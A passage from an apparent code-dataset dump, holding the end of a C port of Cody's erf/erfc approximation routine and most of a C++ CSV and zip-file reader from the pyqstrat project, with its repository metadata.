(S.P.) 3.13E-294 1.26E+322 -27.220 7.11E-15 */\n /* CRAY-1 (S.P.) 4.58E-2467 5.45E+2465 -75.345 7.11E-15 */\n /* IEEE (IBM/XT, */\n /* SUN, etc.) (S.P.) 1.18E-38 3.40E+38 -9.382 5.96E-8 */\n /* IEEE (IBM/XT, */\n /* SUN, etc.) (D.P.) 2.23D-308 1.79D+308 -26.628 1.11D-16 */\n /* IBM 195 (D.P.) 5.40D-79 7.23E+75 -13.190 1.39D-17 */\n /* UNIVAC 1108 (D.P.) 2.78D-309 8.98D+307 -26.615 1.73D-18 */\n /* VAX D-Format (D.P.) 2.94D-39 1.70D+38 -9.345 1.39D-17 */\n /* VAX G-Format (D.P.) 5.56D-309 8.98D+307 -26.615 1.11D-16 */\n /* XBIG XHUGE XMAX */\n /* CDC 7600 (S.P.) 25.922 8.39E+6 1.80X+293 */\n /* CRAY-1 (S.P.) 75.326 8.39E+6 5.45E+2465 */\n /* IEEE (IBM/XT, */\n /* SUN, etc.) (S.P.) 9.194 2.90E+3 4.79E+37 */\n /* IEEE (IBM/XT, */\n /* SUN, etc.) (D.P.) 26.543 6.71D+7 2.53D+307 */\n /* IBM 195 (D.P.) 13.306 1.90D+8 7.23E+75 */\n /* UNIVAC 1108 (D.P.) 26.582 5.37D+8 8.98D+307 */\n /* VAX D-Format (D.P.) 9.269 1.90D+8 1.70D+38 */\n /* VAX G-Format (D.P.) 26.569 6.71D+7 8.98D+307 */\n /* ******************************************************************* */\n /* ******************************************************************* */\n /* Error returns */\n /* The program returns ERFC = 0 for ARG .GE. XBIG; */\n /* ERFCX = XINF for ARG .LT. XNEG; */\n /* and */\n /* ERFCX = 0 for ARG .GE. XMAX. */\n /* Intrinsic functions required are: */\n /* ABS, AINT, EXP */\n /* Author: W. J. 
Cody */\n /* Mathematics and Computer Science Division */\n /* Argonne National Laboratory */\n /* Argonne, IL 60439 */\n /* Latest modification: March 19, 1990 */\n /* ------------------------------------------------------------------ */\n /*< INTEGER I,JINT >*/\n /* S REAL */\n /*< >*/\n /*< DIMENSION A(5),B(4),C(9),D(8),P(6),Q(5) >*/\n /* ------------------------------------------------------------------ */\n /* Mathematical constants */\n /* ------------------------------------------------------------------ */\n /* S DATA FOUR,ONE,HALF,TWO,ZERO/4.0E0,1.0E0,0.5E0,2.0E0,0.0E0/, */\n /* S 1 SQRPI/5.6418958354775628695E-1/,THRESH/0.46875E0/, */\n /* S 2 SIXTEN/16.0E0/ */\n /*< >*/\n /* ------------------------------------------------------------------ */\n /* Machine-dependent constants */\n /* ------------------------------------------------------------------ */\n /* S DATA XINF,XNEG,XSMALL/3.40E+38,-9.382E0,5.96E-8/, */\n /* S 1 XBIG,XHUGE,XMAX/9.194E0,2.90E3,4.79E37/ */\n /*< >*/\n /* ------------------------------------------------------------------ */\n /* Coefficients for approximation to erf in first interval */\n /* ------------------------------------------------------------------ */\n /* S DATA A/3.16112374387056560E00,1.13864154151050156E02, */\n /* S 1 3.77485237685302021E02,3.20937758913846947E03, */\n /* S 2 1.85777706184603153E-1/ */\n /* S DATA B/2.36012909523441209E01,2.44024637934444173E02, */\n /* S 1 1.28261652607737228E03,2.84423683343917062E03/ */\n /*< >*/\n /*< >*/\n /* ------------------------------------------------------------------ */\n /* Coefficients for approximation to erfc in second interval */\n /* ------------------------------------------------------------------ */\n /* S DATA C/5.64188496988670089E-1,8.88314979438837594E0, */\n /* S 1 6.61191906371416295E01,2.98635138197400131E02, */\n /* S 2 8.81952221241769090E02,1.71204761263407058E03, */\n /* S 3 2.05107837782607147E03,1.23033935479799725E03, */\n /* S 4 2.15311535474403846E-8/ */\n /* S DATA D/1.57449261107098347E01,1.17693950891312499E02, */\n /* S 1 5.37181101862009858E02,1.62138957456669019E03, */\n /* S 2 3.29079923573345963E03,4.36261909014324716E03, */\n /* S 3 3.43936767414372164E03,1.23033935480374942E03/ */\n /*< >*/\n /*< >*/\n /* ------------------------------------------------------------------ */\n /* Coefficients for approximation to erfc in third interval */\n /* ------------------------------------------------------------------ */\n /* S DATA P/3.05326634961232344E-1,3.60344899949804439E-1, */\n /* S 1 1.25781726111229246E-1,1.60837851487422766E-2, */\n /* S 2 6.58749161529837803E-4,1.63153871373020978E-2/ */\n /* S DATA Q/2.56852019228982242E00,1.87295284992346047E00, */\n /* S 1 5.27905102951428412E-1,6.05183413124413191E-2, */\n /* S 2 2.33520497626869185E-3/ */\n /*< >*/\n /*< >*/\n /* ------------------------------------------------------------------ */\n /*< X = ARG >*/\n // x = *arg;\n /*< Y = ABS(X) >*/\n y = fabs(x);\n /*< IF (Y .LE. THRESH) THEN >*/\n if (y <= thresh) {\n /* ------------------------------------------------------------------ */\n /* Evaluate erf for |X| <= 0.46875 */\n /* ------------------------------------------------------------------ */\n /*< YSQ = ZERO >*/\n ysq = zero;\n /*< IF (Y .GT. 
XSMALL) YSQ = Y * Y >*/\n if (y > xsmall) {\n ysq = y * y;\n }\n /*< XNUM = A(5)*YSQ >*/\n xnum = a[4] * ysq;\n /*< XDEN = YSQ >*/\n xden = ysq;\n /*< DO 20 I = 1, 3 >*/\n for (int i__ = 1; i__ <= 3; ++i__) {\n /*< XNUM = (XNUM + A(I)) * YSQ >*/\n xnum = (xnum + a[i__ - 1]) * ysq;\n /*< XDEN = (XDEN + B(I)) * YSQ >*/\n xden = (xden + b[i__ - 1]) * ysq;\n /*< 20 CONTINUE >*/\n /* L20: */\n }\n /*< RESULT = X * (XNUM + A(4)) / (XDEN + B(4)) >*/\n result = x * (xnum + a[3]) / (xden + b[3]);\n /*< IF (JINT .NE. 0) RESULT = ONE - RESULT >*/\n if (jint != 0) {\n result = one - result;\n }\n /*< IF (JINT .EQ. 2) RESULT = EXP(YSQ) * RESULT >*/\n if (jint == 2) {\n result = exp(ysq) * result;\n }\n /*< GO TO 800 >*/\n goto L800;\n /* ------------------------------------------------------------------ */\n /* Evaluate erfc for 0.46875 <= |X| <= 4.0 */\n /* ------------------------------------------------------------------ */\n /*< ELSE IF (Y .LE. FOUR) THEN >*/\n } else if (y <= four) {\n /*< XNUM = C(9)*Y >*/\n xnum = c__[8] * y;\n /*< XDEN = Y >*/\n xden = y;\n /*< DO 120 I = 1, 7 >*/\n for (int i__ = 1; i__ <= 7; ++i__) {\n /*< XNUM = (XNUM + C(I)) * Y >*/\n xnum = (xnum + c__[i__ - 1]) * y;\n /*< XDEN = (XDEN + D(I)) * Y >*/\n xden = (xden + d__[i__ - 1]) * y;\n /*< 120 CONTINUE >*/\n /* L120: */\n }\n /*< RESULT = (XNUM + C(8)) / (XDEN + D(8)) >*/\n result = (xnum + c__[7]) / (xden + d__[7]);\n /*< IF (JINT .NE. 2) THEN >*/\n if (jint != 2) {\n /*< YSQ = AINT(Y*SIXTEN)/SIXTEN >*/\n double d__1 = y * sixten;\n ysq = d_int(d__1) / sixten;\n /*< DEL = (Y-YSQ)*(Y+YSQ) >*/\n del = (y - ysq) * (y + ysq);\n /*< RESULT = EXP(-YSQ*YSQ) * EXP(-DEL) * RESULT >*/\n d__1 = exp(-ysq * ysq) * exp(-del);\n result = d__1 * result;\n /*< END IF >*/\n }\n /* ------------------------------------------------------------------ */\n /* Evaluate erfc for |X| > 4.0 */\n /* ------------------------------------------------------------------ */\n /*< ELSE >*/\n } else {\n /*< RESULT = ZERO >*/\n result = zero;\n /*< IF (Y .GE. XBIG) THEN >*/\n if (y >= xbig) {\n /*< IF ((JINT .NE. 2) .OR. (Y .GE. XMAX)) GO TO 300 >*/\n if (jint != 2 || y >= xmax) {\n goto L300;\n }\n /*< IF (Y .GE. XHUGE) THEN >*/\n if (y >= xhuge) {\n /*< RESULT = SQRPI / Y >*/\n result = sqrpi / y;\n /*< GO TO 300 >*/\n goto L300;\n /*< END IF >*/\n }\n /*< END IF >*/\n }\n /*< YSQ = ONE / (Y * Y) >*/\n ysq = one / (y * y);\n /*< XNUM = P(6)*YSQ >*/\n xnum = p[5] * ysq;\n /*< XDEN = YSQ >*/\n xden = ysq;\n /*< DO 240 I = 1, 4 >*/\n for (int i__ = 1; i__ <= 4; ++i__) {\n /*< XNUM = (XNUM + P(I)) * YSQ >*/\n xnum = (xnum + p[i__ - 1]) * ysq;\n /*< XDEN = (XDEN + Q(I)) * YSQ >*/\n xden = (xden + q[i__ - 1]) * ysq;\n /*< 240 CONTINUE >*/\n /* L240: */\n }\n /*< RESULT = YSQ *(XNUM + P(5)) / (XDEN + Q(5)) >*/\n result = ysq * (xnum + p[4]) / (xden + q[4]);\n /*< RESULT = (SQRPI - RESULT) / Y >*/\n result = (sqrpi - result) / y;\n /**< IF (JINT .NE. 2) THEN >*/\n if (jint != 2) {\n /*< YSQ = AINT(Y*SIXTEN)/SIXTEN >*/\n double d__1 = y * sixten;\n ysq = d_int(d__1) / sixten;\n /*< DEL = (Y-YSQ)*(Y+YSQ) >*/\n del = (y - ysq) * (y + ysq);\n /*< RESULT = EXP(-YSQ*YSQ) * EXP(-DEL) * RESULT >*/\n d__1 = exp(-ysq * ysq) * exp(-del);\n result = d__1 * result;\n /*< END IF >*/\n }\n /*< END IF >*/\n }\n /* ------------------------------------------------------------------ */\n /* Fix up for negative argument, erf, etc. */\n /* ------------------------------------------------------------------ */\n /*< 300 IF (JINT .EQ. 
0) THEN >*/\nL300:\n if (jint == 0) {\n /*< RESULT = (HALF - RESULT) + HALF >*/\n result = (half - result) + half;\n /*< IF (X .LT. ZERO) RESULT = -RESULT >*/\n if (x < zero) {\n result = -(result);\n }\n /*< ELSE IF (JINT .EQ. 1) THEN >*/\n } else if (jint == 1) {\n /*< IF (X .LT. ZERO) RESULT = TWO - RESULT >*/\n if (x < zero) {\n result = two - result;\n }\n /*< ELSE >*/\n } else {\n /*< IF (X .LT. ZERO) THEN >*/\n if (x < zero) {\n /*< IF (X .LT. XNEG) THEN >*/\n if (x < xneg) {\n /*< RESULT = XINF >*/\n result = xinf;\n /*< ELSE >*/\n } else {\n /*< YSQ = AINT(X*SIXTEN)/SIXTEN >*/\n double d__1 = x * sixten;\n ysq = d_int(d__1) / sixten;\n /*< DEL = (X-YSQ)*(X+YSQ) >*/\n del = (x - ysq) * (x + ysq);\n /*< Y = EXP(YSQ*YSQ) * EXP(DEL) >*/\n y = exp(ysq * ysq) * exp(del);\n /*< RESULT = (Y+Y) - RESULT >*/\n result = y + y - result;\n /*< END IF >*/\n }\n /*< END IF >*/\n }\n /*< END IF >*/\n }\n /*< 800 RETURN >*/\nL800:\n return result;\n /* ---------- Last card of CALERF ---------- */\n /*< END >*/\n} /* calerf_ */\n\n/* S REAL FUNCTION ERF(X) */\n/*< DOUBLE PRECISION FUNCTION DERF(X) >*/\ndouble erf_cody(double x){\n /* -------------------------------------------------------------------- */\n /* This subprogram computes approximate values for erf(x). */\n /* (see comments heading CALERF). */\n /* Author/date: W. J. Cody, January 8, 1985 */\n /* -------------------------------------------------------------------- */\n /*< INTEGER JINT >*/\n /* S REAL X, RESULT */\n /*< DOUBLE PRECISION X, RESULT >*/\n /* ------------------------------------------------------------------ */\n /*< JINT = 0 >*/\n /*< CALL CALERF(X,RESULT,JINT) >*/\n return calerf(x, 0);\n /* S ERF = RESULT */\n /*< DERF = RESULT >*/\n /*< RETURN >*/\n /* ---------- Last card of DERF ---------- */\n /*< END >*/\n} /* derf_ */\n\n/* S REAL FUNCTION ERFC(X) */\n/*< DOUBLE PRECISION FUNCTION DERFC(X) >*/\ndouble erfc_cody(double x) {\n /* -------------------------------------------------------------------- */\n /* This subprogram computes approximate values for erfc(x). */\n /* (see comments heading CALERF). */\n /* Author/date: W. J. Cody, January 8, 1985 */\n /* -------------------------------------------------------------------- */\n /*< INTEGER JINT >*/\n /* S REAL X, RESULT */\n /*< DOUBLE PRECISION X, RESULT >*/\n /* ------------------------------------------------------------------ */\n /*< JINT = 1 >*/\n /*< CALL CALERF(X,RESULT,JINT) >*/\n return calerf(x, 1);\n /* S ERFC = RESULT */\n /*< DERFC = RESULT >*/\n /*< RETURN >*/\n /* ---------- Last card of DERFC ---------- */\n /*< END >*/\n} /* derfc_ */\n\n/* S REAL FUNCTION ERFCX(X) */\n/*< DOUBLE PRECISION FUNCTION DERFCX(X) >*/\ndouble erfcx_cody(double x) {\n /* ------------------------------------------------------------------ */\n /* This subprogram computes approximate values for exp(x*x) * erfc(x). */\n /* (see comments heading CALERF). */\n /* Author/date: W. J. 
Cody, March 30, 1987 */\n /* ------------------------------------------------------------------ */\n /*< INTEGER JINT >*/\n /* S REAL X, RESULT */\n /*< DOUBLE PRECISION X, RESULT >*/\n /* ------------------------------------------------------------------ */\n /*< JINT = 2 >*/\n /*< CALL CALERF(X,RESULT,JINT) >*/\n return calerf(x, 2);\n /* S ERFCX = RESULT */\n /*< DERFCX = RESULT >*/\n /*< RETURN >*/\n /* ---------- Last card of DERFCX ---------- */\n /*< END >*/\n} /* derfcx_ */\n" }, { "alpha_fraction": 0.4844896197319031, "alphanum_fraction": 0.5023055672645569, "avg_line_length": 30.13050651550293, "blob_id": "e31274cdcbc6481df3edcb23f9788463c8c70f0f", "content_id": "fd0ea34422309e65ee0e05e5899451ff27ce5f98", "detected_licenses": [ "BSD-3-Clause", "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 19084, "license_type": "permissive", "max_line_length": 117, "num_lines": 613, "path": "/pyqstrat/cpp/io/csv_reader.cpp", "repo_name": "abbass2/pyqstrat", "src_encoding": "UTF-8", "text": "//\n// csv_reader.cpp\n// py_c_test\n//\n// Created by Sal Abbasi on 9/12/22.\n//\n\n#include \"csv_reader.hpp\"\n#include <cmath>\n#include <algorithm>\n#include <fstream>\n#include <iostream>\n#include <vector>\n#include <queue>\n#include <mutex>\n#include <zip.h>\n#include <math.h>\n#include <string.h>\n#include <unordered_map>\n#include \"utils.hpp\"\n\n\n// Windows uses _strdup instead of non-standard strdup function\n#ifdef _MSC_VER\n #define strdup _strdup\n #define _CRT_SECURE_NO_WARNINGS\n #include <BaseTsd.h>\n typedef SSIZE_T ssize_t;\n#endif\n\nusing namespace std;\n\nstatic const float NANF = nanf(\"\");\nstatic const double NAND = nan(\"\");\n\nstring get_error(int err_num) {\n char errmsg[255];\n#ifdef _MSC_VER\n ::strerror_s(errmsg, 255, err_num);\n#else\n ::strerror_r(err_num, errmsg, 255);\n#endif\n return string(errmsg);\n}\n\nvector<char*> tokenize_line(char *s, char delim, const vector<int>& col_indices) {\n vector<char*> ret;\n ret.reserve(16);\n size_t col_idx = 0;\n char* begin = s;\n size_t curr_col_idx = 0;\n size_t size = ::strlen(s);\n s[size] = delim; // replace last \\0 with delim so we can tokenize last column\n for (size_t i = 0; i < size + 1; ++i) {\n if (s[i] == delim) {\n s[i] = '\\0';\n if (col_indices[col_idx] == static_cast<int>(curr_col_idx)) {\n ret.push_back(begin);\n col_idx += 1;\n if (col_idx == col_indices.size()) break;\n }\n begin = s + i + 1;\n curr_col_idx += 1;\n }\n }\n return ret;\n}\n\nfloat str_to_float(const char* str, char decimal_point, char thousands_separator) {\n // convert a string to a float\n float result = 0;\n bool zero = false;\n float sign = *str == '-' ? static_cast<void>(str++), -1.0f : 1.0f;\n if (*str == '0') zero = true;\n while ((*str >= '0' && *str <= '9') || (*str == thousands_separator)) {\n if (*str == thousands_separator) {\n str++;\n continue;\n }\n result *= 10;\n result += *str - '0';\n str++;\n }\n if (!zero && (result == 0)) return NANF;\n\n float multiplier = 0.1f;\n if (*str == decimal_point) {\n str++;\n while (*str >= '0' && *str <= '9') {\n result += (*str - '0') * multiplier;\n multiplier /= 10;\n str++;\n }\n }\n \n float power = 0.0f;\n result *= sign;\n if (*str == 'e' || *str == 'E') {\n str++;\n float powerer = *str == '-'? 
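/* comma operator: consume the leading '-' of the exponent, then pick base 0.1 (negative exponent) instead of 10 */ 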
static_cast<void>(str++), 0.1f : 10.0f;\n        \n        while ((*str >= '0') && (*str <= '9')) {\n            power *= 10;\n            power += *str - '0';\n            str++;\n        }\n        result *= pow(powerer, power);\n    }\n    return result;\n}\n\n\ndouble str_to_double(const char* str, char decimal_point, char thousands_separator) {\n    // convert a string to a double\n    double result = 0;\n    bool zero = false;\n    double sign = *str == '-' ? static_cast<void>(str++), -1.0 : 1.0;\n    if (*str == '0') zero = true;\n    while ((*str >= '0' && *str <= '9') || (*str == thousands_separator)) {\n        if (*str == thousands_separator) {\n            str++;\n            continue;\n        }\n        result *= 10;\n        result += *str - '0';\n        str++;\n    }\n    if (!zero && (result == 0)) return NAND;\n    \n    double multiplier = 0.1;\n    if (*str == decimal_point) {\n        str++;\n        while (*str >= '0' && *str <= '9') {\n            result += (*str - '0') * multiplier;\n            multiplier /= 10;\n            str++;\n        }\n    }\n    \n    double power = 0.0;\n    result *= sign;\n    if (*str == 'e' || *str == 'E') {\n        str++;\n        double powerer = *str == '-'? static_cast<void>(str++), 0.1 : 10.0;\n        \n        while ((*str >= '0') && (*str <= '9')) {\n            power *= 10;\n            power += *str - '0';\n            str++;\n        }\n        result *= pow(powerer, power);\n    }\n    return result;\n}\n\nint32_t str_to_int32(const char* str, char thousands_separator) {\n    // convert a string to an int\n    int result = 0;\n    int sign = *str == '-' ? static_cast<void>(str++), -1 : 1;\n    while ((*str >= '0' && *str <= '9') || (*str == thousands_separator)) {\n        if (*str == thousands_separator) {\n            str++;\n            continue;\n        }\n        result *= 10;\n        result += *str - '0';\n        str++;\n    }\n    result *= sign;\n    return result;\n}\n\nint64_t str_to_int64(const char* str, char thousands_separator) {\n    // convert a string to an int\n    int64_t result = 0;\n    int sign = *str == '-' ? static_cast<void>(str++), -1 : 1;\n    while ((*str >= '0' && *str <= '9') || (*str == thousands_separator)) {\n        if (*str == thousands_separator) {\n            str++;\n            continue;\n        }\n        result *= 10;\n        result += *str - '0';\n        str++;\n    }\n    result *= sign;\n    return result;\n}\n\nint8_t str_to_int8(const char* str) {\n    // convert a string to an int, accepting true/false spellings as 1/0\n    auto len = strlen(str);\n    if (len == 0) return 0;\n    if (len == 4) {\n        if (strcmp(str, \"true\") == 0) return 1;\n        if (strcmp(str, \"TRUE\") == 0) return 1;\n        if (strcmp(str, \"True\") == 0) return 1;\n    }\n    if (len == 5) {\n        if (strcmp(str, \"false\") == 0) return 0;\n        if (strcmp(str, \"FALSE\") == 0) return 0;\n        if (strcmp(str, \"False\") == 0) return 0;\n    }\n    int8_t result = 0;\n    int sign = *str == '-' ?
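 /* same consume-the-sign comma idiom used by the float and double parsers above */ 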
static_cast<void>(str++), -1 : 1;\n while (*str >= '0' && *str <= '9') {\n result *= 10;\n result += *str - '0';\n str++;\n }\n result *= sign;\n return result;\n}\n\ntemplate<typename T> T parse_string(const char* str) {\n return std::string(str);\n}\n\ntemplate<> int32_t parse_string<int32_t>(const char* str) {\n return str_to_int32(str, ',');\n}\n\ntemplate<> int64_t parse_string<int64_t>(const char* str) {\n return str_to_int64(str, ',');\n}\n\ntemplate<> float parse_string<float>(const char* str) {\n return str_to_float(str, '.', ',');\n}\n\ntemplate<> double parse_string<double>(const char* str) {\n return str_to_double(str, '.', ',');\n}\n \ntemplate<> int8_t parse_string<int8_t>(const char* str) {\n return str_to_int8(str);\n}\n\ntemplate<typename T> void add_value(const char* str, void* column) {\n T elem = parse_string<T>(str);\n auto vec = static_cast<vector<T>*>(column);\n vec->push_back(elem);\n}\n\nvoid add_line(const vector<char*>& fields, const vector<string>& dtypes, vector<void*>& data) {\n for (size_t i=0; i < dtypes.size(); ++i) {\n if (dtypes[i] == \"f4\") {\n add_value<float>(fields[i], data[i]);\n } else if (dtypes[i] == \"f8\") {\n add_value<double>(fields[i], data[i]);\n } else if (dtypes[i] == \"i1\") {\n add_value<int8_t>(fields[i], data[i]);\n } else if (dtypes[i] == \"i4\") {\n add_value<int32_t>(fields[i], data[i]);\n } else if (dtypes[i] == \"i8\") {\n add_value<int64_t>(fields[i], data[i]);\n } else if (dtypes[i].substr(0, 3) == \"M8[\") {\n add_value<int64_t>(fields[i], data[i]);\n } else if (dtypes[i][0] == 'S') {\n add_value<string>(fields[i], data[i]);\n } else {\n error(\"invalid type: \" << dtypes[i] << \" expected i1, i4, i8, f4, f8, M8[*] or S[n]\");\n }\n }\n}\n\ntemplate<typename T> vector<T>* create_vec(size_t max_rows) {\n auto vec = new vector<T>();\n vec->reserve(max_rows);\n return vec;\n}\n\nvoid* create_vector(const std::string& dtype, size_t max_rows) {\n if (dtype == \"f4\") {\n return create_vec<float>(max_rows);\n } else if (dtype == \"f8\") {\n return create_vec<double>(max_rows);\n } else if (dtype == \"i1\") {\n return create_vec<int8_t>(max_rows);\n } else if (dtype == \"i4\") {\n return create_vec<int32_t>(max_rows);\n } else if (dtype == \"i8\") {\n return create_vec<int64_t>(max_rows);\n } else if (dtype.substr(0, 3) == \"M8[\") {\n return create_vec<int64_t>(max_rows);\n } else if (dtype[0] == 'S') {\n return create_vec<string>(max_rows);\n } else {\n error(\"invalid type: \" << dtype << \" expected i1, i4, i8, f4, f8, M8[*] or S[n]\");\n }\n}\n\nclass ZipArchive {\npublic:\n static ZipArchive& get_instance() {\n static ZipArchive instance; // Guaranteed to be destroyed.\n return instance;\n }\n ZipArchive(const ZipArchive&) = delete;\n void operator=(const ZipArchive&) = delete;\n \n ~ZipArchive() {\n if (_zip_archives.size()) {\n for (auto zip_archive: _zip_archives) {\n zip_close(zip_archive.second);\n }\n }\n }\n \n zip_t* get_archive(const std::string& zip_filename) {\n zip_t* zip_archive = nullptr;\n {\n std::lock_guard<std::mutex> guard(_zip_archives_mutex);\n auto it = _zip_archives.find(zip_filename);\n if (it == _zip_archives.end()) {\n if (_zip_archives.size() > 100) {\n auto it = _zip_archives.find(_fifo.front());\n zip_close(it->second);\n _zip_archives.erase(it);\n _fifo.pop();\n }\n zip_archive = zip_open(zip_filename.c_str(), ZIP_RDONLY, NULL);\n if (!zip_archive) error(\"can't read: \" << zip_filename << \" : \" << get_error(errno));\n _zip_archives.insert(make_pair(zip_filename, zip_archive));\n 
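// remember insertion order so the eviction branch above can close the oldest-opened archive first (FIFO cache)\n                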
_fifo.push(zip_filename);\n } else {\n zip_archive = it->second;\n }\n }\n return zip_archive;\n }\nprivate:\n ZipArchive() {}\n unordered_map<string, zip_t*> _zip_archives;\n queue<string> _fifo;\n mutex _zip_archives_mutex;\n};\n\nstruct Reader {\n virtual ssize_t getline(char** line) = 0;\n virtual string filename() = 0;\n virtual ssize_t fread(char* data, size_t length) = 0;\n virtual ~Reader() {}\n};\n\nstatic const size_t BUF_SIZE = 64 * 1024;\n\nssize_t get_index(char* buf, size_t n, char c) {\n for (size_t i = 0; i < n; ++i) {\n if (buf[i] == c) return i;\n }\n return -1;\n}\n\nssize_t read_line(char** buf, size_t* buf_size, size_t* begin_idx, char** line, Reader* reader) {\n //if buffer is empty read up to buf size into it\n //if cannot read then return -1\n //if buf has data then try to read a line from last position\n //if no line read then we have a partial line\n //copy into\n //read up to buf size\n ssize_t bytes_read = 0;\n size_t line_size = 0;\n ssize_t end_idx = 0;\n if (!*buf) {\n *buf = static_cast<char*>(::malloc(BUF_SIZE));\n //first time only\n bytes_read = reader->fread(*buf, BUF_SIZE);\n if (bytes_read <= 0) return bytes_read;\n *begin_idx = 0;\n *buf_size = bytes_read;\n }\n //buf has data already, try to read a line\n end_idx = get_index(*buf + *begin_idx, *buf_size - *begin_idx, '\\n');\n int begin_inc = 1;\n if (end_idx > 0 && (*buf + *begin_idx)[end_idx - 1] == '\\r') { // windows cr/lf\n end_idx -= 1; // end_idx now points to \\r in \\r\\n\n begin_inc = 2; // next line begins after end_idx + 2 (for \\r\\n)\n }\n\n if (end_idx >= 0) {\n //found a line. update begin index and set line ptr to beginning of this line\n line_size = end_idx;\n (*buf)[*begin_idx + end_idx] = '\\0'; // replace \\r or \\n with \\0 to end line\n *line = *buf + *begin_idx;\n *begin_idx += (end_idx + begin_inc);\n return line_size;\n } else {\n //we read a partial line\n //copy partial line to new buffer\n char* tmp = static_cast<char*>(::malloc(BUF_SIZE));\n size_t partial_str_size = BUF_SIZE - *begin_idx;\n strncpy(tmp, *buf + *begin_idx, partial_str_size);\n ::free(*buf);\n *buf = tmp;\n *begin_idx = 0;\n bytes_read = reader->fread(*buf + partial_str_size, BUF_SIZE - partial_str_size);\n if (bytes_read <= 0) return bytes_read;\n *buf_size = bytes_read + partial_str_size;\n return read_line(buf, buf_size, begin_idx, line, reader);\n }\n}\n \n\nclass ZipReader: public Reader {\npublic:\n ZipReader(const std::string& filename):\n _filename(filename),\n _zip_file(nullptr),\n _buf(nullptr),\n _buf_idx(0),\n _buf_size(0) {\n std::size_t i = filename.find(':');\n auto zip_filename = filename.substr(0, i);\n auto inner_filename = filename.substr(i + 1);\n ZipArchive& archive = ZipArchive::get_instance();\n zip_t* zip_archive = archive.get_archive(zip_filename);\n _zip_file = zip_fopen(zip_archive, inner_filename.c_str(), ZIP_FL_ENC_GUESS);\n if (!_zip_file) error(\"can't read: \" << inner_filename << \" from \" << filename << \" : \" << get_error(errno));\n }\n \n string filename() override { return _filename; }\n \n ssize_t getline(char** line) override {\n return read_line(&_buf, &_buf_size, &_buf_idx, line, this);\n }\n \n ssize_t fread(char* buf, size_t buf_size) override {\n return zip_fread(_zip_file, buf, buf_size);\n }\n \n ~ZipReader() {\n if (_zip_file) zip_fclose(_zip_file);\n _zip_file = nullptr;\n if (_buf) ::free(_buf);\n }\n \nprivate:\n string _filename;\n zip_file_t* _zip_file;\n char* _buf;\n size_t _buf_idx;\n size_t _buf_size;\n};\n\nclass FileReader: public Reader 
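/* stdio-backed counterpart of ZipReader: reads a plain, uncompressed csv file */ 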
{\npublic:\n FileReader(const std::string& filename):\n _filename(filename),\n _file(::fopen(filename.c_str(), \"r\")),\n _buf(nullptr),\n _buf_idx(0),\n _buf_size(0)\n {}\n \n string filename() override {\n return _filename;\n }\n\n ssize_t getline(char** line) override {\n return read_line(&_buf, &_buf_size, &_buf_idx, line, this);\n }\n \n ssize_t fread(char* buf, size_t buf_size) override {\n if (feof(_file)) return -1;\n if (ferror(_file)) error(\"error reading file\");\n size_t elems_read = ::fread(buf, sizeof(char), ::floor(buf_size / sizeof(char)), _file);\n return elems_read * sizeof(char);\n }\n \n ~FileReader() {\n if (_file) ::fclose(_file);\n _file = nullptr;\n if (_buf) ::free(_buf);\n }\n \nprivate:\n string _filename;\n FILE* _file;\n char* _buf;\n size_t _buf_idx;\n size_t _buf_size;\n};\n\n\n\nbool read_csv_file(Reader* reader,\n const std::vector<int>& col_indices,\n const std::vector<std::string>& dtypes,\n char separator,\n int skip_rows,\n int max_rows,\n vector<void*>& output) {\n \n int row_num = 0;\n output.resize(dtypes.size());\n for (size_t i = 0; i < dtypes.size(); ++i) {\n output[i] = create_vector(dtypes[i], max_rows);\n }\n \n bool more_to_read = true;\n for (;;) {\n char* line = nullptr;\n ssize_t line_size = reader->getline(&line);\n if (line_size <= 0) {\n //eof or error. ::getline returns zero in both cases, zip_fread returns -1 for error, 0 for eof\n more_to_read = false;\n break;\n }\n // cout << \"row num: \" << row_num << \" len: \" << strlen(line) << \" \" << line << endl;\n row_num++;\n \n if (row_num <= skip_rows) continue;\n \n if ((max_rows != 0) && (row_num > max_rows)) break;\n auto fields = tokenize_line(line, separator, col_indices);\n if (!fields.size()) continue; // empty line\n if (fields.size() != dtypes.size()) {\n //replace nulls we added with separator so we can print out the line\n string _line(line, line_size);\n std::replace(_line.begin(), _line.end(), '\\0', separator);\n error(reader->filename() << \" found \" << fields.size() << \" \" << \" fields on row: \" << row_num\n << \" line: \" << _line << \" but dtypes arg length was \" << dtypes.size() << endl)\n }\n add_line(fields, dtypes, output);\n }\n return more_to_read;\n}\n\nvoid test_csv_reader() {\n ifstream istr(\"/Users/sal/tmp/test.csv\", ios_base::in);\n auto dtypes = vector<string>{\n \"M8[ms]\",\n \"S10\",\n \"i4\",\n \"f8\",\n \"i1\"};\n vector<void*> output(dtypes.size());\n bool more_to_read = false;\n auto vec1 = reinterpret_cast<vector<string>*>(output[0]);\n auto vec2 = reinterpret_cast<vector<string>*>(output[1]);\n cout << \"row1: \" << (*vec1)[0] << \" \" << (*vec2)[0] << \"\\n\"\n << \"row2: \" << (*vec1)[1] << \" \" << (*vec2)[1] << \"\\n\"\n << \"more_to_read: \" << more_to_read << endl;\n istr.close();\n}\n\n\n\nbool read_csv(const std::string& filename,\n const std::vector<int>& col_indices,\n const std::vector<std::string>& dtypes,\n char separator,\n int skip_rows,\n int max_rows,\n std::vector<void*>& output) {\n bool more_to_read = false;\n std::size_t i = filename.find(':');\n Reader* reader = NULL;\n if (i == filename.npos) {\n reader = new FileReader(filename);\n bool tmp = read_csv_file(reader, col_indices, dtypes, separator, skip_rows, max_rows, output);\n if (tmp) more_to_read = true;\n delete reader;\n } else {\n reader = new ZipReader(filename);\n bool tmp = read_csv_file(reader, col_indices, dtypes, separator, skip_rows, max_rows, output);\n if (tmp) more_to_read = true;\n delete reader;\n }\n return more_to_read;\n}\n\n\nvoid 
